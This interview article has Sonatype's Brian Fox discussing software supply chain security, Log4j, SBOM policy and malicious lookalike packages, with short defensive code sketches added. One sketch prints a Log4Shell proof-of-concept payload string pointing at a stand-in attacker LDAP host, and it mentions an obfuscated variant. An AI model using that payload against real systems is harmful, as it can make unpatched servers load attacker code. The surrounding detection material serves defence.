Open source security expert warns there is still a ‘long road’ ahead to prepare for the next attack wave
INTERVIEW The security of the software supply chain has rocketed up the infosec agenda since The Daily Swig last spoke to Brian Fox, co-founder and CTO at DevSecOps vendor Sonatype.
The landmark Log4j bug and SolarWinds supply chain attack in particular have prompted the White House to act with a clarity, swiftness, and even bipartisan support that has proved elusive in other policy areas.
Fox, who has sounded the alarm on supply chain security for many years, has welcomed the government’s belated recognition of the threat, but warns that the cybersecurity industry is still failing to sufficiently prioritize the issue.
Two years on from our last interview, the recently appointed OpenSSF governance board member also considers the legacy of ‘Log4Shell’, rebuffs criticism of the volunteer-driven open source model, and foresees attack techniques mutating when defenders finally ‘vaccinate’ themselves against current methods.
Daily Swig: Sonatype has been supporting White House efforts to bolster the software supply chain – how is that progressing?
Brian Fox: In the wake of the Log4j incident there was an initial [open source security] summit in January, testimony before the Senate and inquiries in the Senate and House, then the White House convened some meetings.
A follow-up summit in May with many participants across the ecosystem [resulted in a] 10-point mobilization plan that includes everything from better educating developers around secure practices, to better tooling, to funding, to audits of popular open source projects, to prioritizing the most used projects, driving better tooling around software bills of materials, [and] digital signatures...
A number of companies have made monetary pledges – [totalling] about $30 million – to help this effort, which is a lot, but estimates [of the sum needed] to drive all 10 streams were more like $150 million [over two years].
There are also some tentative talks about getting other governments involved, because this is not just a US-centric problem; it’s a global problem.
DS: So do you feel reassured that the US government is tackling the problem in broadly the right way?
BF: Generally, yes. The executive order a little over a year ago set in motion requirements for anybody selling software to the US government to have a reproducible software bill of materials [SBOM] to disclose all components – think food labels.
However, there was a [similar] bill before Congress in 2013 that didn’t get any airtime. So it’s nice to see it happening now but it would’ve been better to see it happening almost a decade ago.
I think there will be a trickle-down effect. Even software companies that don’t directly sell to the US government, if their consumers are selling to the US government, they’re going to have to provide a bill of materials all the way down, right?
DS: Are you still as frustrated as you were in 2020, when you lamented that “many companies still don’t have inventories of their open source components”?
BF: It’s improving, but I’m impatient. As of May 2022, 33% of Log4j downloads from the central repository over the previous 24 hours were still of known vulnerable versions.
Six-plus months on [from the Log4j bug surfacing], is that acceptable? Everybody had a collective freakout, everybody was writing about it – there’s zero reason why you wouldn’t know about it.
Oftentimes companies with really good physical parts practices have terrible digital goods practices – that blows my mind. I don’t understand why I have to educate them.
The mobilization plan largely focuses on improving the open source projects. That needs to be done, but it largely misses the point that organizations have a responsibility to understand what components they’re using.
Take the Takata airbag incident. Let’s say all the [automotive] manufacturers were like, “we’re going to give Takata more money to make better airbags, so we no longer need to track which parts go into our cars” – we would laugh at them. But that’s kind of what’s happening right now [in the software supply chain].
Log4j was fixed and patched over Thanksgiving [within a day of the proof of concept surfacing] – but that doesn’t solve this problem [of users not updating their systems].
DS: What do you make of criticisms of the open source ecosystem’s volunteer-driven model?
BF: I don’t think throwing money at maintainers solves the problem. In fact, it can often complicate things, because then you have new people motivated only by money.
Most problems are not so simple as [maintainers] doing a terrible job. Take Log4j – it wasn’t even really a bug in the code. It was a weird interaction between a feature in Log4j and a feature in Java runtime that executed the JNDI code.
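The interaction Fox describes – a `${jndi:...}` lookup string smuggled into logged, attacker-controlled input – is why much of the early Log4Shell triage amounted to scanning inputs and logs for that pattern. Below is a minimal, illustrative filter for the classic payload shape (the function name and regex are this article’s own sketch, not a real mitigation library); note that obfuscated variants such as `${${lower:j}ndi:...}` defeat naive pattern matching, which is why upgrading Log4j was the only real fix:

```python
import re

# Lookup syntax that vulnerable Log4j versions (2.0-beta9 through
# 2.14.1) would resolve, fetching and executing attacker-hosted code.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    """Heuristic check for a Log4Shell-style payload in untrusted input."""
    return bool(JNDI_PATTERN.search(value))

# A classic proof-of-concept payload, as seen in User-Agent headers:
print(looks_like_log4shell("${jndi:ldap://attacker.example.com/a}"))  # True
print(looks_like_log4shell("ordinary log message"))                   # False
```

The point of the sketch is Fox’s: the payload is well-formed input to a documented feature, not a coding mistake a maintainer could have been expected to catch in review.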
The kneejerk reaction is, “They’re volunteers, therefore they must be amateurs” – and that’s just not true. Most people working on these projects are in fact very good software developers working for big companies during the day. Oftentimes companies pay them to work on these projects.
DS: Can you summarize the current open source threat landscape and how Sonatype is helping developers protect the ecosystem?
BF: There’s a theoretical attack where a malicious committer shows up to a popular project and puts something malicious into a real package. So far that’s not happening.
Because consumers aren’t paying enough attention, it’s really easy to confuse them by creating a fake component with malware in it that sounds similar to the real component.
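The lookalike-name trick Fox describes can be caught with simple string-similarity checks against a list of popular packages. A toy sketch (the allowlist and threshold here are invented for illustration; production tooling such as Sonatype’s uses far richer signals):

```python
import difflib

# Hypothetical list of popular, legitimate package names.
POPULAR = {"requests", "urllib3", "numpy", "django"}

def typosquat_suspects(name: str, threshold: float = 0.85) -> list[str]:
    """Return popular packages this name is suspiciously similar to,
    but not identical to - a possible typosquatting attempt."""
    return sorted(
        p for p in POPULAR
        if p != name
        and difflib.SequenceMatcher(None, p, name).ratio() >= threshold
    )

print(typosquat_suspects("requestss"))  # ['requests']
print(typosquat_suspects("requests"))   # [] - the real package is fine
```

Edit distance alone misses homoglyphs and dependency-confusion attacks, but it shows why a one-character-off name is cheap for an attacker and easy for a hurried developer to miss.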
We’re trying to detect when components are malicious, or are anomalous, and stop consumers from accessing them via our firewall product. The [attack] targets are the developers and development infrastructure, and the bad behavior – the backdoor – is triggered as soon as you download it. They’re not trying to slip code into your software so that it gets distributed to your end user or to production.
So the only way to prevent that is to know, in real time, when that component hits the public repo, that there’s something wrong about it, and be able to stop it.
Timeliness is super important. Finding it six weeks later does no good because during that [time] everybody who touched it got tainted.
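Sonatype’s actual detection is ML-based, as Fox explains next, but the "quarantine until vetted" idea behind a repository firewall can be sketched with a crude rules heuristic (the thresholds and metadata fields below are made up for illustration):

```python
from datetime import datetime, timedelta, timezone

def is_anomalous(published_at: datetime, downloads: int,
                 min_age_days: int = 7, min_downloads: int = 100) -> bool:
    """Quarantine very new or rarely downloaded package versions until
    they can be vetted - malicious uploads are typically both."""
    age = datetime.now(timezone.utc) - published_at
    return age < timedelta(days=min_age_days) or downloads < min_downloads

brand_new = datetime.now(timezone.utc) - timedelta(hours=2)
mature = datetime.now(timezone.utc) - timedelta(days=365)

print(is_anomalous(brand_new, downloads=3))       # True  - blocked for vetting
print(is_anomalous(mature, downloads=50_000))     # False - allowed through
```

Rules like these are easy for attackers to wait out, which is one reason trained models that generalize across attack patterns matter here.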
BF: We use an ML/AI [machine learning/artificial intelligence] technique, so we can train on new attacks and the model gets better and better. As of last month, we’ve reported more than 88,000 malicious packages using this technique, so it’s orders of magnitude more [productive] than zero-day research.
DS: Are we likely to see attackers innovate in the way you envisaged – poisoning projects directly rather than duping developers – any time soon?
BF: They’re continuing to exploit the target vector I was talking about with sometimes more advanced attacks, but many just look like copycats.
We’ve seen this pattern before. It’s a bit like Covid – if everybody gets the vaccine then a mutation finds a way to work around it and that’s the one that survives.
But not enough people are immunized against the current round of attacks, so we’re not seeing a ton of innovation.
That’s why we’re finding and reporting dozens of these every single day. It’s ridiculous.
But what happens when we get really good at [defense]? For over a decade and a half, I was afraid that the attackers would start focusing on the supply chain. That didn’t start happening until 2019.
So if we get good at blocking these easy-ish-to-detect things, then you’ll see them move into the projects with more insidious and difficult-to-detect attacks.
The [White House] mobilization plan will help open source projects become more inherently secure, but it’s a long road so I worry that we’re not gonna get there fast enough.
DS: How receptive has the industry been to your message about protecting the supply chain?
BF: Much of the industry is still fighting the last decade’s battle, which is doing static analysis, prioritizing vulnerabilities, and scanning products before they go into production or get distributed downstream.
Back in the 1990s browsers had vulnerabilities all over the place and, little did you know, you could get hacked just by loading a nefarious website.
That’s kind of what’s happening with these malicious attacks. The developer grabs the wrong component, which isn’t even meant to compile – it’s literally just a payload to deliver a backdoor or do whatever it does. So the developer’s build fails, they realize it’s not the component they wanted – and, worse, they’ve potentially already been hacked.
If you only check what developers have committed or are building for release, you are blind to these 88,000-plus attacks on developers’ machines.
We’ve been really leaning hard on that messaging and a lot of people are finally latching onto it.